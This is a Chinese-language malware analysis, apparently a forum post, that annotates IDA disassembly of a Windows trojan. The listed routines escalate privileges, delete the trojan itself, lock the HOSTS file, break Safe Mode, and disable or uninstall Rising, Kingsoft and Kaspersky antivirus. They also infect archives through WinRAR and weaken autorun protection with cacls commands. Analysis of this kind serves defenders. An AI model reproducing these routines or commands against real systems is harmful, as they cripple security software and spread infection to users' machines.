提权:
代码:
seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394                 push    ebx
seg001:00406395                 add     esp, 0FFFFFFD0h
seg001:00406398                 lea     eax, [esp+30h+TokenHandle]
seg001:0040639C                 push    eax             ; TokenHandle
seg001:0040639D                 push    20h             ; DesiredAccess
seg001:0040639F                 call    GetCurrentProcess
seg001:0040639F
seg001:004063A4                 push    eax             ; ProcessHandle
seg001:004063A5                 call    OpenProcessToken
seg001:004063A5
seg001:004063AA                 lea     eax, [esp+30h+Luid]
seg001:004063AE                 push    eax             ; lpLuid
seg001:004063AF                 push    offset Name     ; "SeDebugPrivilege"
seg001:004063B4                 push    0               ; lpSystemName
seg001:004063B6                 call    LookupPrivilegeValueA
seg001:004063B6
seg001:004063BB                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063BF                 mov     [esp+30h+NewState.Privileges.Luid.LowPart], eax
seg001:004063C3                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063C7                 mov     [esp+30h+NewState.Privileges.Luid.HighPart], eax
seg001:004063CB                 mov     [esp+30h+NewState.PrivilegeCount], 1
seg001:004063D3                 xor     ebx, ebx
seg001:004063D5                 mov     [esp+30h+NewState.Privileges.Attributes], ebx
seg001:004063D9                 push    esp             ; ReturnLength
seg001:004063DA                 lea     eax, [esp+34h+PreviousState]
seg001:004063DE                 push    eax             ; PreviousState
seg001:004063DF                 push    10h             ; BufferLength
seg001:004063E1                 lea     eax, [esp+3Ch+NewState]
seg001:004063E5                 push    eax             ; NewState
seg001:004063E6                 push    0               ; DisableAllPrivileges
seg001:004063E8                 mov     eax, [esp+44h+TokenHandle]
seg001:004063EC                 push    eax             ; TokenHandle
seg001:004063ED                 call    AdjustTokenPrivileges
seg001:004063ED
seg001:004063F2                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063F6                 mov     [esp+30h+PreviousState.Privileges.Luid.LowPart], eax
seg001:004063FA                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063FE                 mov     [esp+30h+PreviousState.Privileges.Luid.HighPart], eax
seg001:00406402                 mov     [esp+30h+PreviousState.PrivilegeCount], 1
seg001:0040640A                 or      ebx, 2
seg001:0040640D                 mov     [esp+30h+PreviousState.Privileges.Attributes], ebx
seg001:00406411                 push    esp             ; ReturnLength
seg001:00406412                 push    0               ; PreviousState
seg001:00406414                 mov     eax, [esp+38h+BufferLength]
seg001:00406418                 push    eax             ; BufferLength
seg001:00406419                 lea     eax, [esp+3Ch+PreviousState]
seg001:0040641D                 push    eax             ; NewState
seg001:0040641E                 push    0               ; DisableAllPrivileges
seg001:00406420                 mov     eax, [esp+44h+TokenHandle]
seg001:00406424                 push    eax             ; TokenHandle
seg001:00406425                 call    AdjustTokenPrivileges
seg001:00406425
seg001:0040642A                 add     esp, 30h
seg001:0040642D                 pop     ebx
seg001:0040642E                 retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp
注册为系统服务,试图在9X系统上隐藏进程:
代码:
seg001:00406598 RegisterService proc near    
seg001:00406598
seg001:00406598                 add     esp, 0FFFFFF6Ch
seg001:0040659E                 mov     [esp+94h+var_94], 94h
seg001:004065A5                 push    esp             ; lpVersionInformation
seg001:004065A6                 call    GetVersionExA
seg001:004065A6
seg001:004065AB                 cmp     eax, 1
seg001:004065AE                 sbb     eax, eax
seg001:004065B0                 inc     eax
seg001:004065B1                 cmp     al, 1
seg001:004065B3                 jnz     short loc_4065FE
seg001:004065B3
seg001:004065B5                 cmp     [esp+94h+var_84], 2
seg001:004065BA                 jz      short loc_4065FE
seg001:004065BA
seg001:004065BC                 push    offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1                 call    LoadLibraryA
seg001:004065C1
seg001:004065C6                 mov     hModule, eax
seg001:004065CB                 cmp     hModule, 0
seg001:004065D2                 jz      short loc_4065FE
seg001:004065D2
seg001:004065D4                 push    offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9                 mov     eax, hModule
seg001:004065DE                 push    eax             ; hModule
seg001:004065DF                 call    GetProcAddress
seg001:004065DF
seg001:004065E4                 mov     addr_RegisterServiceProcess, eax
seg001:004065E9                 push    1
seg001:004065EB                 push    0
seg001:004065ED                 call    addr_RegisterServiceProcess
seg001:004065F3                 mov     eax, hModule
seg001:004065F8                 push    eax             ; hLibModule
seg001:004065F9                 call    FreeLibrary_0   ; "kernel32.dll"
seg001:004065F9
seg001:004065FE loc_4065FE: 
seg001:004065FE                 add     esp, 94h
seg001:00406604                 retn
seg001:00406604
seg001:00406604 RegisterService endp
删除自身——“cmd.exe /c del ***本身路径”:
代码:
seg001:00406A70 del_self        proc near
seg001:00406A70
seg001:00406A70                 push    ebp
seg001:00406A71                 mov     ebp, esp
seg001:00406A73                 add     esp, 0FFFFFEECh
seg001:00406A79                 xor     eax, eax
seg001:00406A7B                 mov     [ebp+var_10C], eax
seg001:00406A81                 mov     [ebp+var_110], eax
seg001:00406A87                 mov     [ebp+var_114], eax
seg001:00406A8D                 xor     eax, eax
seg001:00406A8F                 push    ebp
seg001:00406A90                 push    offset sub_406B2B
seg001:00406A95                 push    dword ptr fs:[eax]
seg001:00406A98                 mov     fs:[eax], esp
seg001:00406A9B                 push    104h            ; nSize
seg001:00406AA0                 lea     eax, [ebp+Buffer]
seg001:00406AA6                 push    eax             ; lpBuffer
seg001:00406AA7                 push    offset s_Comspec ; "Comspec"
seg001:00406AAC                 call    GetEnvironmentVariableA ; 获取环境变量,查找cmd.exe文件路径
seg001:00406AAC
seg001:00406AB1                 push    0
seg001:00406AB3                 lea     eax, [ebp+var_110]
seg001:00406AB9                 lea     edx, [ebp+Buffer]
seg001:00406ABF                 mov     ecx, 105h
seg001:00406AC4                 call    sub_403D34
seg001:00406AC4
seg001:00406AC9                 push    [ebp+var_110]
seg001:00406ACF                 push    offset s_CDel   ; " /c del \""
seg001:00406AD4                 lea     edx, [ebp+var_114]
seg001:00406ADA                 xor     eax, eax
seg001:00406ADC                 call    sub_402708      ; GetModuleFileNameA获取***文件路径
seg001:00406ADC
seg001:00406AE1                 push    [ebp+var_114]
seg001:00406AE7                 push    offset dword_406B5C ; uCmdShow
seg001:00406AEC                 lea     eax, [ebp+var_10C]
seg001:00406AF2                 mov     edx, 4
seg001:00406AF7                 call    sub_403E0C
seg001:00406AF7
seg001:00406AFC                 mov     eax, [ebp+var_10C]
seg001:00406B02                 call    sub_403F4C
seg001:00406B02
seg001:00406B07                 push    eax             ; lpCmdLine
seg001:00406B08                 call    WinExec         ; 即 “cmd.exe /c del ***本身路径”
seg001:00406B08
seg001:00406B0D                 xor     eax, eax
seg001:00406B0F                 pop     edx
seg001:00406B10                 pop     ecx
seg001:00406B11                 pop     ecx
seg001:00406B12                 mov     fs:[eax], edx
seg001:00406B15                 push    offset loc_406B32
seg001:00406B15
seg001:00406B1A loc_406B1A:                     
seg001:00406B1A                 lea     eax, [ebp+var_114]
seg001:00406B20                 mov     edx, 3
seg001:00406B25                 call    sub_403BEC
seg001:00406B25
seg001:00406B2A                 retn
程序运行后清空系统HOSTS文件,然后以独占方式锁定HOSTS和系统启动配置文件,防止用户或某些软件写HOSTS屏蔽***网址,防止XDELBOX类程序重启删除***:
代码:
seg001:00409138                 mov     edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:0040913D                 call    sub_403D54
seg001:0040913D
seg001:00409142                 mov     eax, [ebp-0ACh]
seg001:00409148                 call    FindFile_AdjustFileTime  ; 查找文件,若找到就修正文件时间(FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:00409148
seg001:0040914D                 cmp     al, 1
seg001:0040914F                 jnz     short loc_409194
seg001:0040914F
seg001:00409151                 lea     eax, [ebp-0B4h]
seg001:00409157                 call    GetSystemDirectory
seg001:00409157
seg001:0040915C                 lea     eax, [ebp-0B4h]
seg001:00409162                 mov     edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:00409167                 call    sub_403D54
seg001:00409167
seg001:0040916C                 mov     eax, [ebp-0B4h]
seg001:00409172                 call    sub_403F4C
seg001:00409172
seg001:00409177                 mov     edx, eax
seg001:00409179                 lea     eax, [ebp-0B0h]
seg001:0040917F                 call    sub_403CF8
seg001:0040917F
seg001:00409184                 mov     eax, [ebp-0B0h]
seg001:0040918A                 mov     edx, 10h
seg001:0040918F                 call    sub_4066AC      ; CreateFileA以独占方式打开文件,防修改
seg001:0040918F
seg001:00409194
seg001:00409194 loc_409194:                             ; CODE XREF: seg001:0040914Fj
seg001:00409194                 lea     eax, [ebp-0B8h]
seg001:0040919A                 call    sub_406DEC
seg001:0040919A
seg001:0040919F                 lea     eax, [ebp-0B8h]
seg001:004091A5                 mov     edx, offset s_Boot_ini ; "boot.ini"
seg001:004091AA                 call    sub_403D54
seg001:004091AA
seg001:004091AF                 mov     eax, [ebp-0B8h]
seg001:004091B5                 call    FindFile_AdjustFileTime  ; 查找文件,若找到就修正文件时间(FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:004091B5
seg001:004091BA                 cmp     al, 1
seg001:004091BC                 jnz     short loc_409201
seg001:004091BC
seg001:004091BE                 lea     eax, [ebp-0C0h]
seg001:004091C4                 call    sub_406DEC
seg001:004091C4
seg001:004091C9                 lea     eax, [ebp-0C0h]
seg001:004091CF                 mov     edx, offset s_Boot_ini ; "boot.ini"
seg001:004091D4                 call    sub_403D54
seg001:004091D4
seg001:004091D9                 mov     eax, [ebp-0C0h]
seg001:004091DF                 call    sub_403F4C
seg001:004091DF
seg001:004091E4                 mov     edx, eax
seg001:004091E6                 lea     eax, [ebp-0BCh]
seg001:004091EC                 call    sub_403CF8
seg001:004091EC
seg001:004091F1                 mov     eax, [ebp-0BCh]
seg001:004091F7                 mov     edx, 10h
seg001:004091FC                 call    sub_4066AC      ; 独占方式打开文件,防修改
删除相关注册表项,破坏安全模式:
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
代码:
seg001:0040C6FF Del_Key:                      
seg001:0040C6FF                 mov     ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C704                 mov     edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C709                 mov     eax, 80000002h
seg001:0040C70E                 call    near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C70E
seg001:0040C713                 cmp     al, 1
seg001:0040C715                 jnz     short loc_40C726
seg001:0040C715
seg001:0040C717                 mov     edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C71C                 mov     eax, 80000002h
seg001:0040C721                 call    RegDeleteKey    ; 删除相关键值
seg001:0040C721
seg001:0040C726 Del_Key:                     
seg001:0040C726                 mov     ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C72B                 mov     edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C730                 mov     eax, 80000002h
seg001:0040C735                 call    near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C735
seg001:0040C73A                 cmp     al, 1
seg001:0040C73C                 jnz     short loc_40C74D
seg001:0040C73C
seg001:0040C73E                 mov     edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C743                 mov     eax, 80000002h
seg001:0040C748                 call    RegDeleteKey
删除以下注册表项,使得镜像劫持失效
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
代码:
seg001:0040C76C                 mov     edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C771                 mov     eax, 80000002h
seg001:0040C776                 call    near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C776
seg001:0040C77B                 cmp     al, 1
seg001:0040C77D                 jnz     short loc_40C7AA
seg001:0040C77D
seg001:0040C77F                 push    offset s_SoftwareMic_8 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C784                 mov     eax, off_41356C
seg001:0040C789                 push    dword ptr [eax]
seg001:0040C78B                 push    offset dword_40C884
seg001:0040C790                 lea     eax, [ebp+var_80]
seg001:0040C793                 mov     edx, 3
seg001:0040C798                 call    sub_403E0C
seg001:0040C798
seg001:0040C79D                 mov     edx, [ebp+var_80]
seg001:0040C7A0                 mov     eax, 80000002h
seg001:0040C7A5                 call    RegDeleteKey
设置USB写保护、文件彻底隐藏、修改U盘和光盘为自运行,关闭系统错误报告服务(修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting的DoReport、ShowUI、ReportBootOk,键为0)
代码:
seg001:0040A080                 push    edi             ; phkResult
seg001:0040A081                 push    offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies
seg001:0040A086                 push    80000002h       ; hKey
seg001:0040A08B                 call    RegOpenKeyA
seg001:0040A08B
seg001:0040A090                 push    4               ; cbData
seg001:0040A092                 lea     eax, [ebp+Data]
seg001:0040A095                 push    eax             ; lpData
seg001:0040A096                 push    4               ; dwType
seg001:0040A098                 push    0               ; Reserved
seg001:0040A09A                 push    offset s_Writeprotect ; "WriteProtect"
seg001:0040A09F                 mov     eax, [edi]
seg001:0040A0A1                 push    eax             ; hKey
seg001:0040A0A2                 call    RegSetValueExA
seg001:0040A0A2
seg001:0040A0A7                 mov     eax, [edi]
seg001:0040A0A9                 push    eax             ; hKey
seg001:0040A0AA                 call    RegCloseKey_0
seg001:0040A0AA
seg001:0040A0AF                 xor     eax, eax
seg001:0040A0B1                 mov     dword ptr [ebp+Data], eax
seg001:0040A0B4                 push    edi             ; phkResult
seg001:0040A0B5                 push    offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:0040A0BA                 push    80000001h       ; hKey
seg001:0040A0BF                 call    RegOpenKeyA
seg001:0040A0BF
seg001:0040A0C4                 push    4               ; cbData
seg001:0040A0C6                 lea     eax, [ebp+Data]
seg001:0040A0C9                 push    eax             ; lpData
seg001:0040A0CA                 push    4               ; dwType
seg001:0040A0CC                 push    0               ; Reserved
seg001:0040A0CE                 push    offset s_Showsuperhidd ; "ShowSuperHidden"
seg001:0040A0D3                 mov     eax, [edi]
seg001:0040A0D5                 push    eax             ; hKey
seg001:0040A0D6                 call    RegSetValueExA
seg001:0040A0D6
seg001:0040A0DB                 mov     eax, [edi]
seg001:0040A0DD                 push    eax             ; hKey
seg001:0040A0DE                 call    RegCloseKey_0
seg001:0040A0DE
seg001:0040A0E3                 mov     dword ptr [ebp+Data], 91h
seg001:0040A0EA                 push    edi             ; phkResult
seg001:0040A0EB                 push    offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
seg001:0040A0F0                 push    80000002h       ; hKey
seg001:0040A0F5                 call    RegOpenKeyA
seg001:0040A0F5
seg001:0040A0FA                 push    4               ; cbData
seg001:0040A0FC                 lea     eax, [ebp+Data]
seg001:0040A0FF                 push    eax             ; lpData
seg001:0040A100                 push    4               ; dwType
seg001:0040A102                 push    0               ; Reserved
seg001:0040A104                 push    offset s_Nodrivetypeau ; "NoDriveTypeAutoRun"
seg001:0040A109                 mov     eax, [edi]
seg001:0040A10B                 push    eax             ; hKey
seg001:0040A10C                 call    RegSetValueExA
seg001:0040A10C
seg001:0040A111                 mov     eax, [edi]
seg001:0040A113                 push    eax             ; hKey
seg001:0040A114                 call    RegCloseKey_0
......
通过延迟删除bsmain.exe和RavExt.dll文件来破坏瑞星杀毒软件:

在Windows 2000/XP/Server 2003里面,软件厂商在碰到文件被占用无法马上替换或者删除问题的时候,都会使用MoveFileEx API函数让系统在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager  Value:PendingFileRenameOperations键值下面建立一个延迟删除列表,系统在下次启动的时候,CSRSS.EXE进程将根据这个列表对文件进行延迟更新或者延迟删除操作。
PendingFileRenameOperations是一个REG_MULTI_SZ类型的注册表键值,不能直接通过注册表编辑器编辑,否则会造成延迟删除列表被破坏。要查看这个键值的内容,可以使用注册表编辑器或者专用注册表操作工具。Windows XP在安装完需要重启的补丁以后就是利用PendingFileRenameOperations控制被占用文件进行被占用文件的升级和删除操作的。
代码:
seg001:00409CF3                 mov     ecx, offset s_Pendingfilere ; "PendingFileRenameOperations"
seg001:00409CF8                 mov     edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager
seg001:00409CFD                 mov     eax, 80000002h
seg001:00409D02                 call    sub_408150
seg001:00409D02
......
seg001:00409DF9                 push    4               ; dwFlags
seg001:00409DFB                 push    0               ; lpNewFileName
seg001:00409DFD                 lea     eax, [ebp+var_28C]
seg001:00409E03                 call    GetSystemDirectory
seg001:00409E03
seg001:00409E08                 lea     eax, [ebp+var_28C]
seg001:00409E0E                 mov     edx, offset s_Ravext_dll ; "RavExt.dll"
seg001:00409E13                 call    sub_403D54
seg001:00409E13
seg001:00409E18                 mov     eax, [ebp+var_28C]
seg001:00409E1E                 call    sub_403F4C
seg001:00409E1E
seg001:00409E23                 push    eax             ; lpExistingFileName
seg001:00409E24                 call    MoveFileExA
seg001:00409E24
seg001:00409E29                 push    4               ; dwFlags
seg001:00409E2B                 push    0               ; lpNewFileName
seg001:00409E2D                 lea     eax, [ebp+var_290]
seg001:00409E33                 call    GetSystemDirectory
seg001:00409E33
seg001:00409E38                 lea     eax, [ebp+var_290]
seg001:00409E3E                 mov     edx, offset s_Bsmain_exe ; "bsmain.exe"
seg001:00409E43                 call    sub_403D54
seg001:00409E43
seg001:00409E48                 mov     eax, [ebp+var_290]
seg001:00409E4E                 call    sub_403F4C
seg001:00409E4E
seg001:00409E53                 push    eax             ; lpExistingFileName
seg001:00409E54                 call    MoveFileExA
破解NTFS的AUTO免疫:
使用命令行工具cacls.exe来提高everyone用户对文件autorun.inf的控制权限

CACLS filename [/T] [/E] [/C] [/G user:perm]  
显示或者修改文件的访问控制表(ACL)
   filename      显示 ACL。
   /T            更改当前目录及其所有子目录中指定文件的 ACL。
   /G user:perm  赋予指定用户访问权限。
                 Perm 可以是: R  读取
                              W  写入
                              C  更改(写入)
                              F  完全控制
代码:
seg001:0040D15D                 mov     eax, [ebp+var_4]
seg001:0040D160                 call    GetVolumeInformation
seg001:0040D160
seg001:0040D165                 mov     eax, [ebp+var_27C]
seg001:0040D16B                 mov     edx, offset s_Ntfs ; "NTFS"
seg001:0040D170                 call    sub_403E98
seg001:0040D170
seg001:0040D175                 jnz     short loc_40D1B1
seg001:0040D175
seg001:0040D177                 push    0
seg001:0040D179                 push    offset s_CmdCEchoYCacl ; "cmd /c echo Y| cacls "
seg001:0040D17E                 push    [ebp+var_4]
seg001:0040D181                 push    offset s_Autorun_infTG ; "autorun.inf /t /g everyone:F"
seg001:0040D186                 lea     eax, [ebp+var_280]
模拟发送点击按钮消息来自动卸载金山毒霸2008
代码:
seg001:0040DAB4 KillDuBa        proc near               ; DATA XREF: start+1126o
seg001:0040DAB4                 push    ebx
seg001:0040DAB5                 push    offset s_2008   ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DABA                 push    offset s_32770_1 ; "#32770"
seg001:0040DABF                 call    FindWindowA
seg001:0040DABF
seg001:0040DAC4                 mov     ebx, eax
seg001:0040DAC6                 push    offset s_N>     ; "下一步(&N) >"
seg001:0040DACB                 push    offset s_Button_0 ; "Button"
seg001:0040DAD0                 push    0               ; HWND
seg001:0040DAD2                 push    ebx             ; HWND
seg001:0040DAD3                 call    FindWindowExA
seg001:0040DAD3
seg001:0040DAD8                 mov     ebx, eax
seg001:0040DADA                 push    0               ; lParam
seg001:0040DADC                 push    0               ; wParam
seg001:0040DADE                 push    0F5h            ; Msg
seg001:0040DAE3                 push    ebx             ; hWnd
seg001:0040DAE4                 call    SendMessageA
seg001:0040DAE4
seg001:0040DAE9                 push    0               ; lParam
seg001:0040DAEB                 push    0               ; wParam
seg001:0040DAED                 push    0F5h            ; Msg
seg001:0040DAF2                 push    ebx             ; hWnd
seg001:0040DAF3                 call    SendMessageA
seg001:0040DAF3
seg001:0040DAF8                 push    320h            ; dwMilliseconds
seg001:0040DAFD                 call    Sleep
seg001:0040DAFD
seg001:0040DB02                 push    offset s_2008   ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DB07                 push    offset s_32770_1 ; "#32770"
seg001:0040DB0C                 call    FindWindowA
seg001:0040DB0C
seg001:0040DB11                 mov     ebx, eax
seg001:0040DB13                 push    offset s_U      ; "卸载(&U)"
seg001:0040DB18                 push    offset s_Button_0 ; "Button"
seg001:0040DB1D                 push    0               ; HWND
seg001:0040DB1F                 push    ebx             ; HWND
seg001:0040DB20                 call    FindWindowExA
seg001:0040DB20
seg001:0040DB25                 mov     ebx, eax
seg001:0040DB27                 push    0               ; lParam
seg001:0040DB29                 push    0               ; wParam
seg001:0040DB2B                 push    0F5h            ; Msg
seg001:0040DB30                 push    ebx             ; hWnd
seg001:0040DB31                 call    SendMessageA
seg001:0040DB31
seg001:0040DB36                 push    0               ; lParam
seg001:0040DB38                 push    0               ; wParam
seg001:0040DB3A                 push    0F5h            ; Msg
seg001:0040DB3F                 push    ebx             ; hWnd
seg001:0040DB40                 call    SendMessageA
seg001:0040DB40
seg001:0040DB45                 push    0BB8h           ; dwMilliseconds
seg001:0040DB4A                 call    Sleep
seg001:0040DB4A
seg001:0040DB4F                 push    0               ; lpWindowName
seg001:0040DB51                 push    offset s_Ieframe_0 ; "IEFrame"
seg001:0040DB56                 call    FindWindowA
seg001:0040DB56
seg001:0040DB5B                 mov     ebx, eax
seg001:0040DB5D                 push    1               ; lParam
seg001:0040DB5F                 push    0F060h          ; wParam
seg001:0040DB64                 push    112h            ; Msg
seg001:0040DB69                 push    ebx             ; hWnd
seg001:0040DB6A                 call    SendMessageA
seg001:0040DB6A
seg001:0040DB6F                 pop     ebx
seg001:0040DB70                 retn
seg001:0040DB70
seg001:0040DB70 KillDuBa        endp
感染植入***到.rar和.zip压缩包——“WinRAR.exe a -ep -u -inul”:
命令行模式:
    A      ——添加文件到压缩包
    -ep    ——添加文件时不包含路径信息
    -u     ——更新文件
    -inul  ——禁止错误提示信息
代码:
seg001:0040F7E6                 push    0
seg001:0040F7E8                 push    dword_4149D4
seg001:0040F7EE                 push    offset s_Winrar_exeA-e ; "\\WinRAR.exe a -ep -u -inul "
seg001:0040F7F3                 push    dword_4149D0
seg001:0040F7F9                 push    offset dword_40FF5C
seg001:0040F7FE                 push    [ebp+uCmdShow]  ; uCmdShow
seg001:0040F801                 lea     eax, [ebp+var_1F4]
seg001:0040F807                 mov     edx, 5
seg001:0040F80C                 call    sub_403E0C
seg001:0040F80C
seg001:0040F811                 mov     eax, [ebp+var_1F4]
seg001:0040F817                 call    sub_403F4C
seg001:0040F817
seg001:0040F81C                 push    eax             ; lpCmdLine
seg001:0040F81D                 call    WinExec
键盘映射Win+M(最小化所有窗口)然后阻止瑞星正常升级,最小化操作卡巴卸载程序来卸载卡巴,由于对卡巴的操作与下面的代码大同小异,故不再贴出,不过有一点说明,对付卡巴时,此***还增加了命令“cmd /c Date 2005-4-20”来突破卡巴主动防御
代码:
seg001:0041129F                 mov     eax, offset s_Ravmon_exe ; "RavMon.exe"
seg001:004112A4                 call    sub_4076E8
seg001:004112A4
seg001:004112A9                 cmp     al, 1
seg001:004112AB                 jnz     loc_411387
seg001:004112AB
seg001:004112B1                 lea     eax, [ebp+var_1D0]
seg001:004112B7                 push    eax
seg001:004112B8                 mov     ecx, offset s_Installpath ; "installpath"
seg001:004112BD                 mov     edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav"
seg001:004112C2                 mov     eax, 80000002h
seg001:004112C7                 call    RegQueryValue
......
seg001:004112D7
seg001:004112DC                 push    0               ; dwExtraInfo
seg001:004112DE                 push    0               ; dwFlags
seg001:004112E0                 push    0               ; uMapType
seg001:004112E2                 push    5Bh             ; uCode 5Bh微软左徽标键
seg001:004112E4                 call    MapVirtualKeyA
seg001:004112E4
seg001:004112E9                 push    eax             ; bScan
seg001:004112EA                 push    5Bh             ; bVk
seg001:004112EC                 call    keybd_event
seg001:004112EC
seg001:004112F1                 push    0               ; dwExtraInfo
seg001:004112F3                 push    0               ; dwFlags
seg001:004112F5                 push    0               ; uMapType
seg001:004112F7                 push    4Dh             ; uCode 4Dh是"M"
seg001:004112F9                 call    MapVirtualKeyA
......
seg001:0041132B
seg001:00411330                 push    1               ; uCmdShow
seg001:00411332                 mov     edx, off_413554
seg001:00411338                 mov     edx, [edx]
seg001:0041133A                 lea     eax, [ebp+var_1D4]
seg001:00411340                 mov     ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe"
seg001:00411345                 call    sub_403D98
seg001:00411345
seg001:0041134A                 mov     eax, [ebp+var_1D4]
seg001:00411350                 call    sub_403F4C
seg001:00411350
seg001:00411355                 push    eax             ; lpCmdLine
seg001:00411356                 call    WinExec
seg001:00411356
seg001:0041135B                 push    5DCh            ; dwMilliseconds
seg001:00411360                 call    Sleep
seg001:00411360
seg001:00411365                 mov     eax, lpThreadId
seg001:0041136A                 push    eax             ; lpThreadId
seg001:0041136B                 push    0               ; dwCreationFlags
seg001:0041136D                 push    0               ; lpParameter
seg001:0041136F                 push    offset sub_40DBC8 ; lpStartAddress
seg001:00411374                 push    0               ; dwStackSize
seg001:00411376                 push    0               ; lpThreadAttributes
seg001:00411378                 call    CreateThread
seg001:00411378
seg001:0041137D                 push    0DACh           ; dwMilliseconds
seg001:00411382                 call    Sleep
seg001:00411382
seg001:00411387
seg001:00411387 loc_411387:                             ; CODE XREF: start+E47j
seg001:00411387                 mov     eax, offset s_Avp_exe ; "avp.exe"
seg001:0041138C                 call    sub_4076E8
seg001:0041138C
seg001:00411391                 cmp     al, 1
seg001:00411393                 jnz     uninstall